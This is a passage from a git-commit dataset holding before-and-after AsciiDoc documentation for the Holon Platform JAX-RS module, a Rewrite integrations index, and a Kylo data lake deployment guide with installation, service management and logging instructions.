See <<SwaggerSpringBoot,Swagger Spring Boot integration>>.\n\n[[JaxrsPropertyBox]]\n== `PropertyBox` serialization and deserialization support\n\nThe link:holon-core.html#PropertyBox[PropertyBox] type serialization and deserialization support for JAX-RS compliant servers and clients is available using the following _media types_:\n\n* `application\/json` - see <<JSONMediaTypePropertyBox>>\n* `application\/x-www-form-urlencoded` - see <<FormMediaTypePropertyBox>>\n\n[[JSONMediaTypePropertyBox]]\n=== JSON media type\n\nThe *JSON* serialization and deserialization support for the `PropertyBox` type is provided by the link:holon-json[Holon Platform JSON module]. Both https:\/\/github.com\/FasterXML\/jackson[Jackson^] and link:https:\/\/github.com\/google\/gson[Gson^] JSON providers are supported.\n\nTo learn about `PropertyBox` type mapping strategies and configuration options see the link:holon-json#PropertyBox[PropertyBox] section of the Holon Platform JSON module documentation.\n\nTo enable the `PropertyBox` type support for JSON media type, just ensure that a suitable artifact is present in classpath:\n\n* `holon-jackson-jaxrs` to use the *Jackson* library. See link:holon-json#JacksonJAXRS[Jackson JAX-RS integration] for details.\n* `holon-gson-jaxrs` to use the *Gson* library. See link:holon-json#GsonJAXRS[Gson JAX-RS integration] for details.\n\nThe auto-configuration facilities provided by this two artifacts allow to automatically register and setup all the required JAX-RS features, both for link:https:\/\/github.com\/jersey[Jersey^] and for link:http:\/\/resteasy.jboss.org[Resteasy^] JAX-RS implementations.\n\nWith the `PropertyBox` _JSON_ support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=json,indent=0]\n----\n<1> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instance\n<2> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instances `List`\n<3> A `PUT` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from JSON\n\n[[FormMediaTypePropertyBox]]\n=== Form\/URLencoded media type\n\nThe `application\/x-www-form-urlencoded` media type for `PropertyBox` serialization and deserialization is supported by default and auto-configured for _Jersey_ and _Resteasy_ when the `holon-jaxrs-commons` artifact is present in classpath.\n\nYou can explicitly configure the `application\/x-www-form-urlencoded` media type support in a JAX-RS server or client registering the link:{apidir}\/com\/holonplatform\/jaxrs\/media\/FormDataPropertyBoxFeature.html[FormDataPropertyBoxFeature^].\n\nCAUTION: Only *simple data types* (Strings, Numbers, Booleans, Enums and Dates) are supported for `PropertyBox` serialization and deserialization using the `application\/x-www-form-urlencoded` media type, so you cannot use complex property values (such as Java beans) as `PropertyBox` property values. 
The *JSON* media type is strongly recommended as the `PropertyBox` data interchange format in a JAX-RS environment.\n\nWith the _form\/urlencoded_ `PropertyBox` type support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=form,indent=0]\n----\n<1> A `POST` endpoint method which accepts a form-encoded `PropertyBox` as a body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from `application\/x-www-form-urlencoded` data\n\n\/\/ Inclusions\n\ninclude::_client.adoc[]\n\ninclude::_server.adoc[]\n\ninclude::_spring.adoc[]\n\ninclude::_swagger.adoc[]\n\n== Loggers\n\nBy default, the Holon platform uses the https:\/\/www.slf4j.org[SLF4J^] API for logging. The use of SLF4J is optional: it is enabled when the presence of SLF4J is detected in the classpath. Otherwise, logging will fall back to JUL (`java.util.logging`).\n\nThe logger names for the *JAX-RS* module are:\n\n* `com.holonplatform.jaxrs` base JAX-RS module logger\n* `com.holonplatform.jaxrs.swagger` for the _Swagger_ integration classes\n\n== System requirements\n\n=== Java\n\nThe Holon Platform JAX-RS module requires https:\/\/www.java.com[Java] *8* or higher.\n\nThe _JAX-RS_ specification version *2.0 or above* is required.\n\nThis module is tested against link:https:\/\/github.com\/jersey[Jersey^] version *2.x* and link:http:\/\/resteasy.jboss.org[Resteasy^] version *3.x*.\n","old_contents":"= Holon Platform JAX-RS Module - Reference manual\n:description: Holon platform JAX-RS module reference documentation. \\\nIt concerns the platform JAX-RS and REST services support, including authentication and authorization, JWT support, Jersey and Resteasy integration, Swagger OpenAPI support, Spring framework integration and Spring Boot auto-configuration.\n:revnumber: {project-version}\n:apidir: ..\/api\/holon-jax-rs\n:coreapidir: ..\/api\/holon-core\n:linkattrs:\n:sectnums:\n:nofooter:\n:toc: left\n:toclevels: 3\n\nCopyright \u00a9 2016-2018\n\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\n\n== Introduction\n\nThe Holon Platform *JAX-RS* module provides support, components and configuration helpers concerning the link:https:\/\/github.com\/jax-rs\/spec\/blob\/master\/spec.pdf[JAX-RS^] - _Java API for RESTful Web Services_.\n\nThe module provides *JAX-RS* implementations and integrations for platform foundation components and structures, such as the link:holon-core.html#RestClient[RestClient] API, server-side authentication and authorization using a link:holon-core.html#Realm[Realm] and a complete link:http:\/\/swagger.io[Swagger^] _OpenAPI_ support for data containers such as link:holon-core.html#PropertyBox[PropertyBox].\n\nRegarding the *JSON* data-interchange format, this module uses the link:holon-json.html[Holon JSON module] to make available the Holon platform JSON extensions and configuration facilities for JAX-RS endpoints and clients, allowing you to seamlessly use link:https:\/\/github.com\/FasterXML\/jackson[Jackson^] or link:https:\/\/github.com\/google\/gson[Gson^] as JSON providers and provide support for _temporal_ types (including the `java.time.*` API) and the `PropertyBox` type out-of-the-box. 
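As a quick illustration, a JSON-enabled endpoint might look like the following minimal sketch (the property set, names and values here are hypothetical, shown only to illustrate the idea; the full examples live in `ExamplePropertyBox.java`):\n\n[source, java]\n----\n@Path(\"products\")\npublic class ProductEndpoint {\n\n\t\/\/ Hypothetical property set used to encode and decode the PropertyBox\n\tstatic final PathProperty<Long> ID = PathProperty.create(\"id\", Long.class);\n\tstatic final PathProperty<String> NAME = PathProperty.create(\"name\", String.class);\n\tstatic final PropertySet<?> PRODUCT = PropertySet.of(ID, NAME);\n\n\t@GET\n\t@Path(\"{id}\")\n\t@Produces(MediaType.APPLICATION_JSON)\n\tpublic PropertyBox getProduct(@PathParam(\"id\") Long id) {\n\t\t\/\/ the returned PropertyBox value is serialized as JSON by the configured provider\n\t\treturn PropertyBox.builder(PRODUCT).set(ID, id).set(NAME, \"A product\").build();\n\t}\n}\n----\n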
\n\nFurthermore, the module makes available a set of *auto-configuration* features, both for the JAX-RS ecosystem and for the link:https:\/\/spring.io[Spring^] and link:https:\/\/projects.spring.io\/spring-boot[Spring Boot^] world.\n\nA complete support for the most used JAX-RS implementations (link:https:\/\/github.com\/jersey[Jersey^] and link:http:\/\/resteasy.jboss.org[Resteasy^]) is provided, including Resteasy auto-configuration classes for Spring Boot integration.\n\n== Obtaining the artifacts\n\nThe Holon Platform uses https:\/\/maven.apache.org[Maven^] for projects build and configuration. All the platform artifacts are published in the *Maven Central Repository*, so there is no need to explicitly declare additional repositories in your project `pom` file.\n\nAt the top of each _section_ of this documentation you will find the Maven _coordinates_ (group id, artifact id and version) to obtain the artifact(s) as a dependency for your project.\n\nA *BOM (Bill Of Materials)* `pom` is provided to import the available dependencies for a specific version in your projects. The Maven coordinates for the core BOM are the following:\n\n_Maven coordinates_:\n[source, xml, subs=\"attributes+\"]\n----\n<groupId>com.holon-platform.jaxrs<\/groupId>\n<artifactId>holon-jaxrs-bom<\/artifactId>\n<version>{revnumber}<\/version>\n----\n\nThe BOM can be imported in a Maven project in the following way:\n\n[source, xml, subs=\"verbatim,quotes,attributes+\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>com.holon-platform.jaxrs<\/groupId>\n\t\t\t<artifactId>holon-jaxrs-bom<\/artifactId>\n\t\t\t<version>{revnumber}<\/version>\n\t\t\t*<type>pom<\/type>*\n\t\t\t*<scope>import<\/scope>*\n\t\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\n=== Using the Platform BOM\n\nThe Holon Platform provides an *overall Maven BOM (Bill of Materials)* to easily obtain all the available platform artifacts.\n\nSee link:index.html#obtain-the-platform-artifacts[Obtain the platform artifacts] for details.\n\n[[WhatsNew51x]]\n== What's new in version 5.1.x\n\n* Improved support for the `java.time.*` Date and Time API data types when a `PropertyBox` type is serialized and deserialize as *JSON* in JAX-RS endpoints. See <<JSONMediaTypePropertyBox>>.\n\n* The new `JaxrsAuthenticationInspector` API is available in JAX-RS endpoints to inspect current `Authentication` and perform authorization controls using a JAX-RS `SecurityContext`. See <<JaxrsAuthenticationInspector>>.\n\n* Added support for *Spring Security* based authentication, providing features to integrate the `@Authenticate` annotation based authentication behaviour and using the Spring Security context as authentication handler. See <<JaxrsSpringSecurity>>.\n\n* Improved *Spring Boot* auto-configuration support for _Jersey_ and _Resteasy_ JAX-RS implementations. See <<JaxrsSpringBoot>>.\n\n* Improved link:https:\/\/swagger.io[Swagger^] integration and auto-configuration, using Spring Boot application properties for easier configuration. 
See <<SwaggerSpringBoot,Swagger Spring Boot integration>>.\n\n[[JaxrsPropertyBox]]\n== `PropertyBox` serialization and deserialization support\n\nThe link:holon-core.html#PropertyBox[PropertyBox] type serialization and deserialization support for JAX-RS compliant servers and clients is available using the following _media types_:\n\n* `application\/json` - see <<JSONMediaTypePropertyBox>>\n* `application\/x-www-form-urlencoded` - see <<FormMediaTypePropertyBox>>\n\n[[JSONMediaTypePropertyBox]]\n=== JSON media type\n\nThe *JSON* serialization and deserialization support for the `PropertyBox` type is provided by the link:holon-json[Holon Platform JSON module]. Both https:\/\/github.com\/FasterXML\/jackson[Jackson^] and link:https:\/\/github.com\/google\/gson[Gson^] JSON providers are supported.\n\nTo learn about `PropertyBox` type mapping strategies and configuration options see the link:holon-json#PropertyBox[PropertyBox] section of the Holon Platform JSON module documentation.\n\nTo enable the `PropertyBox` type support for JSON media type, just ensure that a suitable artifact is present in classpath:\n\n* `holon-jackson-jaxrs` to use the *Jackson* library. See link:holon-json#JacksonJAXRS[Jackson JAX-RS integration] for details.\n* `holon-gson-jaxrs` to use the *Gson* library. See link:holon-json#GsonJAXRS[Gson JAX-RS integration] for details.\n\nThe auto-configuration facilities provided by this two artifacts allow to automatically register and setup all the required JAX-RS features, both for link:https:\/\/github.com\/jersey[Jersey^] and for link:http:\/\/resteasy.jboss.org[Resteasy^] JAX-RS implementations.\n\nWith the `PropertyBox` _JSON_ support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=json,indent=0]\n----\n<1> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instance\n<2> A `GET` endpoint method which returns a JSON-encoded `PropertyBox` instances `List`\n<3> A `PUT` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from JSON\n\n[[FormMediaTypePropertyBox]]\n=== Form\/URLencoded media type\n\nThe `application\/x-www-form-urlencoded` media type for `PropertyBox` serialization and deserialization is supported by default and auto-configured for _Jersey_ and _Resteasy_ when the `holon-jaxrs-commons` artifact is present in classpath.\n\nYou can explicitly configure the `application\/x-www-form-urlencoded` media type support in a JAX-RS server or client registering the link:{apidir}\/com\/holonplatform\/jaxrs\/media\/FormDataPropertyBoxFeature.html[FormDataPropertyBoxFeature^].\n\nCAUTION: Only *simple data types* (Strings, Numbers, Booleans, Enums and Dates) are supported for `PropertyBox` serialization and deserialization using the `application\/x-www-form-urlencoded` media type, so you cannot use complex property values (such as Java beans) as `PropertyBox` property values. 
The *JSON* media type is strongly recommended as `PropertyBox` data interchange format in a JAX-RS environment.\n\nWith the _form\/urlencoded_ `PropertyBox` type support enabled, you can write JAX-RS endpoints like this:\n\n[source, java]\n----\ninclude::{examplesdir}\/com\/holonplatform\/jaxrs\/examples\/ExamplePropertyBox.java[tag=form,indent=0]\n----\n<1> A `POST` endpoint method which accepts a JSON-encoded `PropertyBox` as body parameter. The `@PropertySetRef` annotation is used to specify the `PropertySet` to be used to decode the `PropertyBox` from `application\/x-www-form-urlencoded` data\n\n\/\/ Inclusions\n\ninclude::_client.adoc[]\n\ninclude::_server.adoc[]\n\ninclude::_spring.adoc[]\n\ninclude::_swagger.adoc[]\n\n== Loggers\n\nBy default, the Holon platform uses the https:\/\/www.slf4j.org[SLF4J^] API for logging. The use of SLF4J is optional: it is enabled when the presence of SLF4J is detected in the classpath. Otherwise, logging will fall back to JUL (`java.util.logging`).\n\nThe logger names for the *JAX-RS* module are:\n\n* `com.holonplatform.jaxrs` base JAX-RS module logger\n* `com.holonplatform.jaxrs.swagger` for the _Swagger_ integration classes\n\n== System requirements\n\n=== Java\n\nThe Holon Platform JSON module requires https:\/\/www.java.com[Java] *8* or higher.\n\nThe _JAX-RS_ specification version *2.0 or above* is required.\n\nThis module is tested against link:https:\/\/github.com\/jersey[Jersey^] version *2.x* and link:http:\/\/resteasy.jboss.org[Resteasy^] version *3.x*.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca43c881a45079796d4d7180ee77dd2f3c27d20a","subject":"Update index.asciidoc","message":"Update index.asciidoc","repos":"ocpsoft\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,jsight\/rewrite,jsight\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/integration\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/integration\/index.asciidoc","new_contents":"link:..\/index.asciidoc[← Docs Index]\n\n== Integrations and Extensions\n\n* link:cdi.asciidoc[CDI Integration] \n* link:spring.asciidoc[Spring Integration] \n","old_contents":"link:..\/[← Docs Index]\n\n== Integrations and Extensions\n\n* link:cdi[CDI Integration] \n* link:spring[Spring Integration] \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa8eee5165cb52f07a0930c605f2f49f0fa957af","subject":"Re-structure kerberos docs and add steps to deployment doc","message":"Re-structure kerberos docs and add steps to deployment doc\n","repos":"rashidaligee\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,Teradata\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo","old_file":"docs\/latest\/deployment-guide.adoc","new_file":"docs\/latest\/deployment-guide.adoc","new_contents":"= Data Lake Accelerator Deployment Guide\n\nWARNING: There is an issue with the spark client using the SQL context with Orc tables using HDP 2.4.2. 
Please see this troubleshooting tip to configure the spark client to work around the issue.\n\nhttps:\/\/wiki.thinkbiganalytics.com\/display\/RD\/Spark+SQL+fails+on+empty+ORC+table%2C+HDP+2.4.2\n\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the Data Lake Accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.8 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|Cloudera Sandbox|http:\/\/www.cloudera.com\/downloads\/quickstart_vms\/5-7.html|5.7\n|===\n\n=== Prerequisites\n\n==== Hortonworks Sandbox\n\nIf installing in a new Hortonworks sandbox, make sure to do the following first before running through the installation steps below.\n\nlink:.\/hortonworks-sandbox.adoc[Configure Hortonworks Sandbox]\n\n==== Java Requirements\nData Lake Accelerator requires Java 8 for NiFi, thinkbig-ui, and thinkbig-services. If you already have Java 8 installed as the system level Java you have the option to leverage that.\n\nIn some cases, such as with an HDP install, Java 7 is the system version and you likely will not want to change it to Java 8. In this case you can leverage the\nscripts mentioned below to download and configure Java 8 in the \/opt\/java directory. The scripts will also modify the startup scripts for NiFi, thinkbig-ui and\nthinkbig-services to reference the \/opt\/java JAVA_HOME.\n\nIf you already have Java 8 installed in a different location you will have the option to use that as well.\n\nNOTE: When installing the RPM, the applications default to using the \/opt\/java\/current location. This default saves a step for developers so that they can uninstall and re-install\nthe RPM without having to run any other scripts.\n\n== Installation\nThere are 3 procedures you can follow to deploy the solution. In a test and production environment you will likely want to follow the manual installation guide as it has more\ndetailed instructions on how to install each individual component. For local development and 1 node development boxes you can leverage the setup wizard procedure to quickly bootstrap\nyour environment.\n\n=== Install Procedure 1: Installing all components on one edge node with internet access using the wizard\n\nFollow the steps below to install the data lake accelerator using the installation wizard script. This is convenient for local sandboxes (HDP\/Cloudera)\nand 1 node development boxes. 
The WGET command is used to download binaries so internet access is required.\n\nClick on the below link to go to the wizard driven deployment instructions\n\nlink:.\/deployment\/wizard-deployment-guide.adoc[Wizard Driven Deployment Guide]\n\n=== Install Procedure 2: Installing each component manually\nClick on the below link to go to the manual deployment instructions\n\nlink:.\/deployment\/manual-deployment-guide.adoc[Manual Deployment Guide]\n\n=== Install Procedure 3: Cloudera EC2 Docker Sandbox\nThis is an option for those who want to deploy PCNG to a single node Cloudera sandbox in AWS. This is useful when you need to get a quick Cloudera instance running to test PCNG but don't have\nthe resources to install a Cloudera cluster.\n\nlink:.\/deployment\/cloudera-docker-sandbox.adoc[Cloudera EC2 Docker Sandbox Deployment Guide]\n\n== Configuration\n\n=== Kerberos\n\nIf you're installing Kylo on a Kerberos cluster, some additional configuration is required.\n\n. Configuring Kerberos For Your Local HDP Sandbox\n\n This guide will help you enable Kerberos for your local development sandbox\n\n link:.\/security\/kerberos\/kerberos-installation-example-hdp-2.4.adoc[HDP 2.4 Sandbox Kerberos Setup Example]\n\n. Configure Kerberos for NiFi\n\n Some additional configuration is required for allowing the NiFi components to work with a Kerberos cluster.\n\n link:.\/security\/kerberos\/nifi-configuration-kerberos-cluster.adoc[Configure NiFi for Kerberos]\n\n. Configure Kerberos for Kylo Applications\n\n Additional configuration is required for allowing some features in the Kylo applications to work with a Kerberos cluster\n\n TODO\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services is located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Optimizing Performance\n\nYou can adjust the memory settings for each service using the environment variables below\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n export THINKBIG_UI_OPTS= -Xmx4g\n\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n export THINKBIG_SERVICES_OPTS= -Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB.\n\n=== Change the Java Home\nBy default the thinkbig-services and thinkbig-ui applications set the JAVA_HOME location to \/opt\/java\/current. This can easily be changed by editing the JAVA_HOME environment variable\nin the following two files\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n\nIn addition, if you run the script to modify the NiFi JAVA_HOME variable you will need to edit\n\n \/opt\/nifi\/current\/bin\/nifi.sh\n\n== Starting and Stopping the Services Manually\nIf you follow the instructions for the installation steps above, all of the below applications will be set to start up automatically if you restart the server. In the Hortonworks sandbox\nthe services for thinkbig and NiFi are set to start after all of the services managed by Ambari start up.\n\nFor starting and stopping the 3 data lake accelerator services you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. 
To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Log Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\/nifi\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Cleanup scripts\nFor development and sandbox environments you can leverage the cleanup script to remove all of the Think Big services as well as Elasticsearch,\nActiveMQ, and NiFi.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanup-env.sh\n\n IMPORTANT Only run this in a DEV environment. This will delete all application and the MySQL schema\n\nIn addition there is a script for cleaning up the hive schema and HDFS folders that are related to a specific \"category\" that is defined in the UI.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh [categoryName]\n\n Example: \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh customers\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","old_contents":"= Data Lake Accelerator Deployment Guide\n\nWARNING: There is an issue with the spark client using the SQL context with Orc tables using HDP 2.4.2. Please see this troubleshooting tip configure the spark client to work around the issue.\n\nhttps:\/\/wiki.thinkbiganalytics.com\/display\/RD\/Spark+SQL+fails+on+empty+ORC+table%2C+HDP+2.4.2\n\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the Data Lake Accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. 
The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.8 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|Cloudera Sandobx|http:\/\/www.cloudera.com\/downloads\/quickstart_vms\/5-7.html|5.7\n|===\n\n=== Prerequisites\n\n==== Hortonworks Sandbox\n\nIf installing in a new Hortonworks sandbox make sure to do the following first before running through the installation steps below.\n\nlink:.\/hortonworks-sandbox.adoc[Configure Hortonworks Sandbox]\n\n==== Java Requirements\nData Lake Accelerator requires Java 8 for NiFi, thinkbig-ui, and thinkbig-services. If you already have Java 8 installed as the system level Java you have the option to leverage that.\n\nIn some cases, such as with an HDP install, Java 7 is the system version and you likely will not want to change it to Java 8. In this case you can leverage the mentioned\nscripts below to download and configure Java 8 in the \/opt\/java directory. The scripts will also modify the startup scripts for NiFi, thinkbig-ui and\nthinkbig-services to reference the \/opt\/java JAVA_HOME.\n\nIf you already have Java 8 installed in a different location you will have the option to use that as well.\n\nNOTE: When installing the RPM the applications are defaulted to use the \/opt\/java\/current location. This default saves a step for developers so that they can uninstall and re-install\nthe RPM without having to run any other scripts.\n\n== Installation\nThere are 3 procedures you can follow to deploy the solution. In a test and production environment you will likely want to follow the manual installation guide as it has more\ndetailed instructions on how to install each individual component. For local development and 1 node development boxes you can leverage the setup wizard procedure to quickly bootstrap\nyour environment.\n\n=== Install Procedure 1: Installing all components on one edge node with internet access using the wizard\n\nFollow the steps below to install the data lake accelerator using the installation wizard script. This is convenient for local sandboxes (HDP\/Cloudera)\nand 1 node development boxes. The WGET command is used to download binaries so internet access is required.\n\nClick on the below link to go to the wizard driven deployment instructions\n\nlink:.\/deployment\/wizard-deployment-guide.adoc[Wizard Driven Deployment Guide]\n\n=== Install Procedure 2: Installing each component manually\nClick on the below link to go to the manual deployment instructions\n\nlink:.\/deployment\/manual-deployment-guide.adoc[Manual Deployment Guide]\n\n=== Install Procedure 3: Cloudera EC2 Docker Sandbox\nThis is an option for those who want to deploy PCNG to single node Cloudera sandbox in AWS. This is useful when you need to get a quick Cloudera instance running to test PCNG but don't have\nthe resources to install a Cloudera cluster\n\nlink:.\/deployment\/cloudera-docker-sandbox.adoc[Cloudera EC2 Docker Sandbox Deployment Guide ]\n\n== Configuration\n\n=== Kerberos\n\nIf your installing Kylo on a kerberos cluster there is some additional configuration required.\n\n. 
Configuring Kerberos For Your Local HDP Sandbox\n\n This guide will help you enabled kerberos for your local development sandbox\n\n link:.\/security\/kerberos\/kerberos-installation-example-hdp-2.4.adoc\n\n. Configure Kerberos for NiFi\n\n Some additional configuration is required for allowing the NiFi componenets to work with a Kerberos cluster.\n\n link:.\/security\/kerberos\/nifi-configuration-kerberos-cluster.adoc\n\n. Configure Kerberos for Kylo Applications\n\n Additional configuration is required for allowing some features in the Kylo applications to work with a Kerberos cluster\n\n TODO\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting for each services using the below environment variables\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n export THINKBIG_UI_OPTS= -Xmx4g\n\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n export THINKBIG_SERVICES_OPTS= -Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB.\n\n=== Change the Java Home\nBy default the thinkbig-services and thinkbig-ui application set the JAVA_HOME location to \/opt\/java\/current. This can easily be changed by editing the JAVA_HOME environment variable\nin the following two files\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n\nIn addition, if you run the script to modify the NiFI JAVA_HOME variable you will need to edit\n\n \/opt\/nifi\/current\/bin\/nifi.sh\n\n== Starting and Stopping the Services Manually\nIf you follow the instructions for the installations steps above all of the below applications will be set to startup automatically if you restart the server. In the Hortonworks sandbox\nthe services for thinkbig and NiFI are set to start after all of the services managed by Ambari start up.\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Log Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. 
Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\/nifi\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Cleanup scripts\nFor development and sandbox environments you can leverage the cleanup script to remove all of the Think Big services as well as Elasticsearch,\nActiveMQ, and NiFi.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanup-env.sh\n\n IMPORTANT Only run this in a DEV environment. This will delete all application and the MySQL schema\n\nIn addition there is a script for cleaning up the hive schema and HDFS folders that are related to a specific \"category\" that is defined in the UI.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh [categoryName]\n\n Example: 